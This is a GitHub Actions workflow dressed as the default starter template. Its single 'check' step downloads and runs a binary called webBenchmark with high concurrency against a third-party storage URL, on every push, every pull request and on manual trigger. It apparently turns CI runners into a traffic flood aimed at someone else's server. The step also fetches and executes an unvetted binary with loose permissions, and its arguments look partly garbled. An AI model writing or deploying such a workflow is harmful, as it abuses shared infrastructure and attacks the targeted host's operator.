# This is a basic workflow to help you get started with Actions

name: Main

on:
  #or pull request event
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell====
      - name: check
        run: wget -N https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64 -O wb && chmod 777 wb &&./wb -c 128 -s  webBenchmark_x64.exe -c 96 -s https://voc-public-storage.xcnya.cn/usercontent/cover/20fd7093-abb9-480b-8021-5382824d7a88/72a22143-1122-4b0a-aadd-e0b6dde173d-so7acs9
